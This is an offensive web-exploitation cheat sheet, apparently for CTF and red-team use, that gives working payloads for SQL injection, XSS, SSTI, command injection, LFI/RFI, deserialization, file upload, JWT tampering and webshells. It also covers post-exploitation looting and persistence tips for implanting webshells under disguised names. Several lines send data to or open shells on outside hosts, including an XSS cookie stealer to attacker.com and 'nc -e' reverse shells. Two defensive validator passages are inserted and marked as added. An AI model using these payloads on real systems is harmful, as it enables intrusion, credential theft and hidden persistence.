
Web Exploitation Deep Dive — Hacking the Web Like a Surgeon


The web is the frontline of hacking. From SQL injections and XSS payloads to SSRF, SSTI, and Remote Code Execution (RCE), web exploitation lets you turn weak input validation into full system compromise. This guide equips you with professional-grade offensive techniques and CTF-ready workflows.


I. 🧩 Core Concepts

Concept         Description
Input Vectors   Parameters, headers, cookies, or body data you can manipulate.
Injection       Supplying unexpected data to change logic or trigger code.
Context         The environment where the payload executes (SQL, JS, template, shell).
Impact          Data exposure, bypass, command execution, or full takeover.


II. ⚙️ Reconnaissance and Fingerprinting

🧠 Identify Technology Stack

whatweb http://target.com

🧩 Directory Bruteforce

gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt

⚙️ Parameter Discovery

ffuf -u http://target.com/page.php?FUZZ=test -w /usr/share/wordlists/params.txt

🧠 Common Headers to Check

X-Powered-By
Server
Cookie
Set-Cookie

III. 💣 SQL Injection (SQLi)

🧩 Basic Detection

Append a single quote (') to a parameter and watch the response for SQL errors.

Example:

?id=1'
?id=1 or 1=1--

⚙️ Automated Scanning

sqlmap -u "http://target.com/page.php?id=1" --batch --dbs

🧠 Manual Exploitation

?id=1 UNION SELECT 1,2,3--
?id=-1 UNION SELECT 1,@@version,3--

💣 Dump Credentials

sqlmap -u "http://target.com/login.php" --dump -D users -T creds

⚙️ Bypass Authentication

' OR '1'='1'-- -
' OR 1=1#
admin'--

IV. ⚙️ Cross-Site Scripting (XSS)

🧠 Reflected XSS

<script>alert(1)</script>
"><svg onload=alert(1)>

💣 Stored XSS

<script>new Image().src='http://attacker.com/'+document.cookie</script>

⚙️ DOM-Based XSS

<script>eval(location.hash.slice(1))</script>
#alert(1)

🧠 XSS with Event Handlers

<img src=x onerror=alert(1337)>
<svg onload=prompt(document.domain)>

V. 🧩 Cross-Site Request Forgery (CSRF)

⚙️ Basic Concept

Forces a logged-in user to perform actions they didn’t intend.

💣 CSRF Exploit Example

<form action="http://victim.com/change_password.php" method="POST">
  <input type="hidden" name="password" value="hacked123">
  <input type="submit">
</form>
<script>document.forms[0].submit()</script>

VI. 🧠 Server-Side Request Forgery (SSRF)

⚙️ Basic Payloads

http://target.com/fetch?url=http://127.0.0.1:80
http://target.com/fetch?url=file:///etc/passwd

💣 Internal Service Enumeration

curl "http://target.com/fetch?url=http://169.254.169.254/latest/meta-data/"

⚙️ Bypass Filters

http://127.1/
http://[::1]/
http://[email protected]/
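An added example (not from the original guide) of the server-side check that these bypasses are aimed at: before fetching, the server resolves the URL's host to addresses and refuses loopback, link-local (the 169.254.169.254 metadata range), private, and userinfo-prefixed targets, and it parses short forms such as `127.1` the way curl does. `is_safe_target`, `parse_ip_literal`, `is_internal` and the injectable `resolve` parameter are names chosen here.

```python
import ipaddress
import socket
from urllib.parse import urlsplit


def parse_ip_literal(host):
    """Return the address if host is an IP literal, else None. inet_aton also
    accepts the abbreviated dotted forms curl accepts, such as '127.1'."""
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        pass
    try:
        return ipaddress.ip_address(socket.inet_aton(host))
    except OSError:
        return None


def is_internal(ip):
    """Loopback, RFC 1918, link-local (169.254.169.254 metadata), reserved,
    multicast and unspecified addresses, including IPv4 mapped into IPv6."""
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped:
        ip = ip.ipv4_mapped                     # ::ffff:127.0.0.1 is still loopback
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)


def default_resolve(host):
    """All A/AAAA answers for host (assumed resolver; injectable for tests)."""
    return [info[4][0] for info in socket.getaddrinfo(host, None)]


def is_safe_target(url, resolve=default_resolve):
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False                            # blocks file://, gopher://, etc.
    if parts.username is not None or parts.password is not None:
        return False                            # rejects http://user@internal/ tricks
    host = parts.hostname
    if not host:
        return False
    ip = parse_ip_literal(host)
    if ip is not None:
        return not is_internal(ip)
    try:
        addrs = resolve(host)
    except OSError:
        return False
    # Every resolved address must be external, not only the first one.
    return bool(addrs) and not any(is_internal(ipaddress.ip_address(a)) for a in addrs)
```

Because the name is resolved before the fetch, a DNS answer can change between the two steps (rebinding); connect to the address that was validated rather than resolving again.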

VII. ⚙️ Server-Side Template Injection (SSTI)

🧠 Identify Framework

{{7*7}}  → Jinja2 (Python)
<%= 7*7 %>  → JSP / Ruby ERB
${7*7}  → Spring / Thymeleaf

💣 Exploit Examples

Jinja2 (Python Flask)

{{config.__class__.__init__.__globals__['os'].popen('id').read()}}

Twig (PHP)

{{_self.env.registerUndefinedFilterCallback('exec')}}{{_self.env.getFilter('id')}}

VIII. 💣 Remote Code Execution (RCE)

⚙️ Command Injection

ping -c 4 10.10.14.2; cat /etc/passwd

🧠 Bypass Filters

|| ls
|cat /etc/passwd|
$(id)
`whoami`

⚙️ URL Encoded Payloads

%3bcat%20/etc/passwd
%26id

IX. 🧩 Local File Inclusion (LFI)

⚙️ Basic Payloads

?page=../../../../etc/passwd
?page=php://filter/convert.base64-encode/resource=index.php

🧠 Log Poisoning for RCE

  1. Inject PHP payload into logs:

     <?php system($_GET['cmd']); ?>

  2. Access via LFI to execute:

     curl "http://target.com/index.php?page=/var/log/apache2/access.log&cmd=id"

X. ⚙️ Remote File Inclusion (RFI)

💣 Payload

?page=http://attacker.com/shell.txt

shell.txt:

<?php system($_GET['cmd']); ?>

XI. 🧠 Deserialization Vulnerabilities

⚙️ PHP Example

<?php
class Evil {
  function __destruct() {
    system('id');
  }
}
echo base64_encode(serialize(new Evil()));
?>

💣 Java Example

Use ysoserial:

java -jar ysoserial.jar CommonsCollections1 "nc -e /bin/sh 10.10.14.2 4444" | base64

XII. ⚙️ File Upload Exploitation

🧩 Upload Shell

<?php system($_GET['cmd']); ?>

🧠 Bypass Filters

  • Rename extensions: .phtml, .php3, .phar

  • Double extensions: file.php.jpg

  • Null byte trick: file.php%00.jpg

  • Use content-type spoofing:

    Content-Type: image/jpeg
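An added example (not from the original guide) of an upload check that closes each item in the list: it rejects NUL bytes, checks every extension component rather than the last one, uses an allowlist with a content check instead of the client-supplied Content-Type, and assigns a server-chosen name. `validate_upload`, `IMAGE_MAGIC` and `EXECUTABLE` are names chosen here; the magic bytes are the standard JPEG/PNG/GIF prefixes.

```python
import os
import secrets

# Allowed extensions with the magic bytes the content must start with.
IMAGE_MAGIC = {
    "jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8",
}
# Extensions that common server configurations hand to an interpreter.
EXECUTABLE = {"php", "php3", "php4", "php5", "php7", "phtml", "phar",
              "asp", "aspx", "jsp", "jspx", "cgi", "pl"}


def validate_upload(filename, content_type, data):
    """Return a server-chosen file name for data, or None to reject it.
    content_type is deliberately unused: the client sets it, so a check on it
    is defeated by the content-type spoofing listed above."""
    if "\x00" in filename:                        # file.php%00.jpg after URL decoding
        return None
    base = os.path.basename(filename.replace("\\", "/")).lower()
    parts = base.split(".")
    if len(parts) < 2 or not parts[0]:
        return None
    if any(p in EXECUTABLE for p in parts[1:]):  # file.php.jpg: every suffix is checked
        return None
    ext = parts[-1]                               # .phtml / .php3 never reach here
    magic = IMAGE_MAGIC.get(ext)
    if magic is None or not data.startswith(magic):
        return None                               # allowlist plus real content check
    # Never reuse the user's name; store the file outside the web root or under
    # a path the server is configured not to execute.
    return f"{secrets.token_hex(16)}.{ext}"
```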

💣 Execute

http://target.com/uploads/shell.php?cmd=id

XIII. ⚙️ Authentication & Logic Bypasses

Technique             Payload
SQL Bypass            ' OR '1'='1'-- -
Password Reset Abuse  Manipulate [email protected] → change admin’s password
JWT Manipulation      Change alg from RS256 → none
Cookie Tampering      Base64 decode + modify user role


XIV. 🧠 Information Disclosure

/.git/HEAD
/.env
/config.php.bak
/backup.zip
/index.old

Extract secrets:

grep -E "DB_PASS|SECRET" .env

XV. ⚙️ WebShell Arsenal

Type              Payload
PHP               <?php system($_GET['cmd']); ?>
ASP               <% eval request("cmd") %>
JSP               <% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
Python Flask RCE  {{ request.args.x.__init__.__globals__['os'].popen(request.args.cmd).read() }}


XVI. 💣 Post-Exploitation on Web Servers

🧠 Privilege Escalation

sudo -l
find / -perm -4000 -type f 2>/dev/null

⚙️ Lateral Movement

ssh -i id_rsa [email protected]

💾 Looting Credentials

cat /var/www/html/config.php
cat ~/.bash_history

XVII. ⚙️ Real-World Attack Chain Example

# 1. Discover parameter
http://target.com/profile.php?id=1

# 2. SQLi → Extract creds
?id=-1 UNION SELECT 1,username,password FROM users--

# 3. Login as admin
# 4. Upload PHP shell
# 5. Execute
curl http://target.com/uploads/shell.php?cmd=id
# 6. Reverse shell
curl "http://target.com/uploads/shell.php?cmd=nc -e /bin/bash 10.10.14.2 4444"

XVIII. 🧠 Automation for CTFs

⚙️ Web Enum Script

#!/bin/bash
# $1: base URL of the target, e.g. http://target.com
url="$1"
gobuster dir -u "$url" -w /usr/share/wordlists/dirb/common.txt -t 50
ffuf -u "$url/FUZZ" -w /usr/share/wordlists/raft-large-files.txt
whatweb "$url"

💣 Python Exploit Skeleton

import requests

url = "http://target.com/vuln.php"
payload = "' UNION SELECT 1,@@version,3-- -"
# requests URL-encodes the payload when it builds the query string
r = requests.get(url, params={"id": payload}, timeout=10)
print(r.status_code)
print(r.text)

XIX. ⚔️ Pro Tips & Red Team Tricks

Chaining Attacks

  • SQLi → RCE via file write.

  • XSS → cookie theft → session hijack.

  • SSTI → reverse shell → local privilege escalation.

Obfuscation

  • Encode payloads (base64, urlencode).

  • Replace keywords: system → syst\u0065m.

Automation

  • Integrate Burp Suite macros + Intruder for mass testing.

  • Use sqlmap --os-shell for auto exploitation.

Stealth

  • Use custom headers:

    X-Originating-IP: 127.0.0.1
    X-Forwarded-For: localhost

Persistence

  • Implant webshells under legitimate names: /uploads/cache.php, /img/.update.php.


XX. ⚙️ Quick Reference Table

Attack       Tool            Example Payload
SQLi         sqlmap          --dbs
XSS          Burp / manual   <svg onload=alert(1)>
SSRF         curl            url=http://127.0.0.1
SSTI         manual          {{7*7}}
LFI          browser / curl  ?page=../../../../etc/passwd
RCE          curl            ?cmd=whoami
File Upload  Burp            Upload .phtml
JWT Tamper   jwt_tool        --none

